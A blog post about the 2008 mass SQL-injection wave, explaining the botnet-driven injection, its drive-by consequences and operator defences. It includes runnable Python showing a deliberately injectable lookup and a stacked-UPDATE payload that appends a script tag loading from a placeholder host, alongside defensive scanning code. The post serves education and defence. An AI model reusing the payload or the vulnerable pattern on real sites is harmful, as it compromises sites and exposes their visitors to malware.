The mass SQL injection wave

A sustained mass SQL-injection wave has been running through spring 2008. Hundreds of thousands of websites have been compromised; the payload injected into their pages exposes every subsequent visitor to drive-by exploitation. The scale is substantial and still growing.

This is a longer post because the category, automated SQL-injection-driven mass compromise, is structurally important.

What is happening

The mechanism is simple. Automated scanners find database-backed pages whose query-string parameters reach SQL unfiltered; an injection payload appends a reference to hostile JavaScript to text columns in the site's database; that tag is then served on every dynamically generated page that displays the affected data. A visitor to a compromised site loads the injected script, which redirects the browser to exploitation infrastructure serving browser exploits. The targets this spring have overwhelmingly been classic ASP and ASP.NET sites on Microsoft SQL Server, and the payload arrives as a hex-encoded T-SQL batch (a CAST of a 0x... literal followed by EXEC, which defeats naive keyword filters) that walks the system catalogue with a cursor and appends the script tag to every text column of every user table.

The scanning is done by botnets; Asprox has been identified as one of them. Infected hosts run scanner code that searches for candidate pages, fire the injection once, and move on. The compromised site then does the rest of the work by serving the tag to everyone who visits.
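As an added illustration, not code from the original post and not the wave's actual payload, here is the mechanism reduced to a runnable Python script against an in-memory SQLite database. The catalogue, the `example.invalid` script host and the function names are constructed for the example. The real payload discovered every text column through a T-SQL cursor over sysobjects and syscolumns; SQLite has no cursor syntax, so the example appends the tag to one known column, and `executescript()` stands in for a driver that accepts stacked statements, as ADO plus SQL Server did.

```python
import sqlite3

# Placeholder for the remote script the real payload referenced; not a real indicator.
INJECTED_TAG = '<script src="http://example.invalid/b.js"></script>'


def make_catalogue() -> sqlite3.Connection:
    """Constructed sample data: a small catalogue like the dynamic ASP pages hit this spring."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A plain widget.');
        INSERT INTO products VALUES (2, 'Gadget', 'A plain gadget.');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, product_id: str) -> None:
    """The anti-pattern at the root of the wave: the query-string value is concatenated
    straight into the SQL text and the whole batch goes to the database. executescript()
    stands in for a driver that accepts stacked statements, as ADO + SQL Server did."""
    sql = "SELECT name, description FROM products WHERE id = " + product_id
    conn.executescript(sql)


def attacker_payload(table: str = "products", column: str = "description") -> str:
    """What the bot puts in the id= parameter: close the intended statement, add an UPDATE
    that appends the script tag to every row of a text column, comment out the rest.
    The real T-SQL payload discovered table and column names itself with a cursor over
    sysobjects/syscolumns; that discovery is not reproduced here."""
    return f"1; UPDATE {table} SET {column} = {column} || '{INJECTED_TAG}'; --"


def render_page(conn: sqlite3.Connection, product_id: int) -> str:
    """The site's template echoes stored text into HTML without encoding, so whatever
    sits in the column is served as live markup to every visitor."""
    name, desc = conn.execute(
        "SELECT name, description FROM products WHERE id = ?", (product_id,)
    ).fetchone()
    return f"<h1>{name}</h1><p>{desc}</p>"


def demo() -> dict[int, str]:
    """One scanner hit against the vulnerable page, then what two ordinary visitors get."""
    conn = make_catalogue()
    vulnerable_lookup(conn, attacker_payload())
    return {pid: render_page(conn, pid) for pid in (1, 2)}


if __name__ == "__main__":
    for pid, html in demo().items():
        print(pid, html)
```

Note that the scanner only ever requested one product page; both pages now carry the tag, because the injection changed data, not code, and the template trusts the data.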

The pattern through spring 2008:

Hundreds of thousands of compromised websites. Vendor estimates range from 100,000 to several hundred thousand sites, and the count is still rising.

High-profile sites among them. Several major UK and US sites have been visibly compromised; the reputational damage is real.

Exploitation infrastructure absorbing the traffic. Visitors to compromised sites are redirected to exploit servers that deploy malware; the compromise of visitor populations is substantial.

The net effect is a sustained mass-compromise event that combines SQL injection at scale with drive-by exploitation at scale. The combination is structurally novel and the impact is meaningful.

Why this matters structurally

Three observations.

Web-application vulnerabilities are now operational substrate for mass compromise. Earlier web-application worms (Yamanner, Samy) demonstrated propagation within a single site; the current wave demonstrates that the same class of vulnerability supports compromise across hundreds of thousands of unrelated sites.

The compromise supply chain has matured. Scanners identify vulnerabilities, an injection stage deploys the payload, exploit servers absorb the redirected traffic, and commercial cybercrime monetises the infected visitors. Each stage is operational and the hand-offs between them are routine.

Defensive responsibility crosses operator boundaries. An organisation whose website is compromised exposes its visitors, who have no relationship with it beyond loading a page, to subsequent compromise. Operator-level discipline therefore matters more than was previously appreciated.

What operators should do

For organisations running database-backed websites:

Fix the entry point. SQL injection is how the attacker gets in. Parameterised queries, ORM frameworks that bind values rather than concatenate them, and an input-validation layer bound the exposure. The discipline matters because one injectable parameter anywhere on the site is enough.

Monitor database content. The payload modifies data, not code, so watch for unauthorised changes to text columns: an unexpected '<script' in a product description is the injection, and finding it early bounds the investigation.

Monitor served content. Verify from outside that what the site serves matches what it should serve. The injected tag is detectable by scanning rendered pages for script references to hosts you do not control, and once found, cleanup is a bounded job.

Maintain the whole posture. Input validation, output encoding, regular vulnerability assessment and architectural review together matter more than any single control.
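An added example, not from the original post, that puts the first three controls above into code: the parameterised lookup that closes the entry point, a database-side scan for script tags in text columns, and an external check of the served page against an allow-list of script hosts. The table, the allow-list hosts and the `example.invalid` indicator are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Constructed allow-list: hosts this site legitimately loads script from.
TRUSTED_SCRIPT_HOSTS = {"www.example.com", "static.example.com"}

# Matches <script ... src=...> and captures the source URL.
SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.IGNORECASE)


def safe_lookup(conn: sqlite3.Connection, product_id: str):
    """Parameterised form of the lookup. The value is bound, never parsed as SQL, so a
    stacked 'UPDATE ...' in the parameter is just a string that matches no id."""
    cur = conn.execute("SELECT name, description FROM products WHERE id = ?", (product_id,))
    return cur.fetchone()


def text_columns(conn: sqlite3.Connection) -> list[tuple[str, str]]:
    """Every TEXT column of every user table, read from the catalogue, so the scan does
    not depend on someone remembering which columns are rendered."""
    cols = []
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
        for _cid, name, ctype, *_rest in conn.execute(f"PRAGMA table_info({table})"):
            if ctype.upper() == "TEXT":
                cols.append((table, name))
    return cols


def find_injected_rows(conn: sqlite3.Connection) -> list[tuple[str, str, int, str]]:
    """Database-side monitor: scan all text columns for embedded <script src=...> tags.
    Table and column names come from sqlite_master, not from users, so the f-string is safe.
    Returns (table, column, rowid, src) per hit; schedule it and alert on any result."""
    hits = []
    for table, col in text_columns(conn):
        rows = conn.execute(f"SELECT rowid, {col} FROM {table} WHERE {col} LIKE '%<script%'")
        for rowid, value in rows:
            for m in SCRIPT_SRC_RE.finditer(value or ""):
                hits.append((table, col, rowid, m.group(1)))
    return hits


def foreign_scripts(html: str) -> list[str]:
    """Served-content monitor, run from outside against the rendered page: list script
    sources whose host is not on the allow-list. Relative URLs are same-origin and skipped."""
    bad = []
    for m in SCRIPT_SRC_RE.finditer(html):
        host = urlparse(m.group(1)).hostname
        if host is not None and host not in TRUSTED_SCRIPT_HOSTS:
            bad.append(m.group(1))
    return bad


def demo() -> dict:
    """Constructed sample: one clean row and one row that has already been injected."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A plain widget.');
        INSERT INTO products VALUES (2, 'Gadget',
            'A plain gadget.<script src="http://example.invalid/b.js"></script>');
        """
    )
    attack = "1; UPDATE products SET description = 'owned'; --"
    page = (
        '<script src="http://static.example.com/site.js"></script>'
        '<p>A plain gadget.<script src="http://example.invalid/b.js"></script></p>'
    )
    return {
        "attack_row": safe_lookup(conn, attack),  # None: the payload matched nothing
        "clean_row": safe_lookup(conn, "1"),  # ('Widget', 'A plain widget.')
        "db_hits": find_injected_rows(conn),
        "page_hits": foreign_scripts(page),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The database scan is the cheaper and earlier signal, because it sees the modified row before any page is rendered; the external page check is the one that catches injection paths you did not know about, including ones that never touch your database.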

For organisations whose users browse compromised sites:

Browser patch level. Current browsers (Firefox, IE 7) with current patches resist most of the drive-by exploits in use; older, unpatched browsers expose users substantially.

Anti-malware. Endpoint anti-malware catches many of the deployed payloads and is worth keeping current.

URL filtering. Operators with web filtering can block the known exploit destinations, which reduces user exposure for as long as the redirect domains stay on the list.

What this teaches structurally

The mass SQL-injection wave illustrates a structural pattern: web-application security is now operationally critical and structurally underinvested. Defensive discipline lags the offensive trajectory.

Three structural observations.

Web-application security tooling needs to mature. Scanners, input-handling libraries, architectural patterns and code-review tools all need investment. The trajectory is positive; deployment is still limited.

The training-and-discipline gap is structural. Developers continue to write injectable code and applications continue to ship with the vulnerability; training and architectural discipline are the remedy.

The cost of web-application security gaps is now meaningful. Organisations whose websites are compromised face reputation damage, regulatory exposure and cleanup cost; the incentive structure is shifting toward better discipline.

What I am doing

For my own infrastructure: minimal database-backed website exposure; bounded direct risk.

For Gala Coral: a web-application security review, monitoring of website content, and continued discipline.

For my own continued writing: more on the web-application security category. The cumulative archive grows.

What I am paying attention to

Three things over the next several months.

Scope of the mass compromise. This is the tracking metric; the count will continue to be assessed.

Operator response and cleanup trajectory. 60% probability of meaningful response. The cleanup workload across affected operators is substantial.

Industry-level conversations about web-application security. 50% probability of meaningful response. The wave may motivate them.

For my own continued operation: the discipline continues. The cumulative archive grows.

More in time.
